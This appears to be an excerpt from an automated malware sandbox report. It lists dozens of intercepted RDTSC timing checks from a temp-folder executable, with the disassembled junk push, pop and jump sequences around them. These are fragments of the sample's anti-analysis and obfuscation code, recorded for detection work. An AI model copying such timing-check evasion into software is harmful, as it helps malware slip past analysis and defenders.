Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0B00C second address: D0B026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jng 00007FC9F53C6A7Ch 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D7E7 second address: D0D7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D7EB second address: D0D7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D7F1 second address: D0D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D7F7 second address: D0D7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D7FC second address: D0D822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9F53DFD69h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D822 second address: D0D82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FC9F53C6A76h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D82E second address: D0D832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0FECC second address: D0FED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0FED0 second address: D0FEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC9F53DFD56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FC9F53DFD63h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D1000A second address: D10027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FC9F53C6A84h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D14A19 second address: D14A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D14A1F second address: D14A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9F53C6A80h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7FC76 second address: C7FC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7FC7C second address: C7FC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7FC84 second address: C7FC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7FC8F second address: C7FC93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7FC93 second address: C7FC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D17619 second address: D17621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D17779 second address: D177B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FC9F53DFD56h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e jnp 00007FC9F53DFD56h 0x00000014 pop esi 0x00000015 push ecx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jnl 00007FC9F53DFD56h 0x00000020 jmp 00007FC9F53DFD66h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D19555 second address: D19564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007FC9F53C6A76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC3967 second address: CC396C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC396C second address: CC398D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC9F53C6A86h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC398D second address: CC3993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC3993 second address: CC39CD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov cx, ax 0x00000010 push 00000004h 0x00000012 mov cx, 0F8Bh 0x00000016 adc cx, 6231h 0x0000001b nop 0x0000001c jmp 00007FC9F53C6A84h 0x00000021 push eax 0x00000022 jc 00007FC9F53C6A7Eh 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D1DF17 second address: D1DF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D1DF1E second address: D1DF3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A88h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D274D4 second address: D2750B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC9F53DFD5Ah 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC9F53DFD67h 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D25604 second address: D2560A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2560A second address: D2560E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2560E second address: D25612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D25E09 second address: D25E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D25E0D second address: D25E1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC9F53C6A76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D25E1F second address: D25E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D260C7 second address: D260CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D260CB second address: D260FB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC9F53DFD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC9F53DFD62h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC9F53DFD5Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D260FB second address: D260FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D260FF second address: D2610B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007FC9F53DFD56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2610B second address: D26125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A86h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D26125 second address: D26137 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC9F53DFD56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D263C0 second address: D263C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D26644 second address: D26648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D268FA second address: D268FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D268FE second address: D26908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D26BD8 second address: D26BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2A277 second address: D2A281 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC9F53DFD56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2A281 second address: D2A287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2A553 second address: D2A55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC9F53DFD56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2A6BE second address: D2A6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9F53C6A81h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2F701 second address: D2F705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2F705 second address: D2F70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D36432 second address: D36462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC9F53DFD61h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FC9F53DFD5Ah 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D368A8 second address: D368F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9F53C6A87h 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007FC9F53C6A83h 0x00000013 pop edx 0x00000014 push esi 0x00000015 jmp 00007FC9F53C6A85h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D36E25 second address: D36E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D37263 second address: D37268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D35F75 second address: D35FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FC9F53DFD5Eh 0x0000000b jnp 00007FC9F53DFD56h 0x00000011 pop ebx 0x00000012 push ebx 0x00000013 jmp 00007FC9F53DFD62h 0x00000018 jmp 00007FC9F53DFD5Ch 0x0000001d pop ebx 0x0000001e pushad 0x0000001f jmp 00007FC9F53DFD69h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D35FCC second address: D35FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D35FD2 second address: D35FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007FC9F53DFD56h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D35FE3 second address: D35FED instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC9F53C6A76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C817 second address: D3C831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FC9F53DFD63h 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C831 second address: D3C84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC9F53C6A76h 0x00000009 ja 00007FC9F53C6A76h 0x0000000f jne 00007FC9F53C6A76h 0x00000015 popad 0x00000016 jbe 00007FC9F53C6A7Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C84F second address: D3C880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007FC9F53DFD5Eh 0x0000000f je 00007FC9F53DFD56h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jnl 00007FC9F53DFD56h 0x00000020 jo 00007FC9F53DFD56h 0x00000026 jnc 00007FC9F53DFD56h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C880 second address: D3C886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C886 second address: D3C88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C88A second address: D3C88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D42157 second address: D4218A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC9F53DFD56h 0x0000000a popad 0x0000000b jl 00007FC9F53DFD5Eh 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007FC9F53DFD56h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC9F53DFD66h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D4218A second address: D421A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D41B90 second address: D41BA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD63h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D41BA9 second address: D41BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D4F450 second address: D4F466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD60h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D4F466 second address: D4F46C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D4F46C second address: D4F470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D533F6 second address: D533FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D533FA second address: D53418 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC9F53DFD63h 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D5804F second address: D5805C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FC9F53C6A7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D5805C second address: D58085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FC9F53DFD5Ch 0x0000000d jl 00007FC9F53DFD56h 0x00000013 jmp 00007FC9F53DFD66h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D58085 second address: D58096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A7Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D58096 second address: D5809A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D5809A second address: D580A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D580A0 second address: D580B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FC9F53DFD56h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D580B0 second address: D580B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D60CAD second address: D60CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 jns 00007FC9F53DFD5Ah 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007FC9F53DFD61h 0x00000017 jc 00007FC9F53DFD56h 0x0000001d jmp 00007FC9F53DFD65h 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jl 00007FC9F53DFD56h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D60B77 second address: D60B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D676E1 second address: D6774F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9F53DFD5Ch 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FC9F53DFD69h 0x00000017 jmp 00007FC9F53DFD61h 0x0000001c jmp 00007FC9F53DFD67h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6774F second address: D6775B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC9F53C6A7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67B01 second address: D67B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC9F53DFD56h 0x0000000a jmp 00007FC9F53DFD68h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC9F53DFD5Ch 0x00000016 pop eax 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a je 00007FC9F53DFD58h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67B40 second address: D67B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
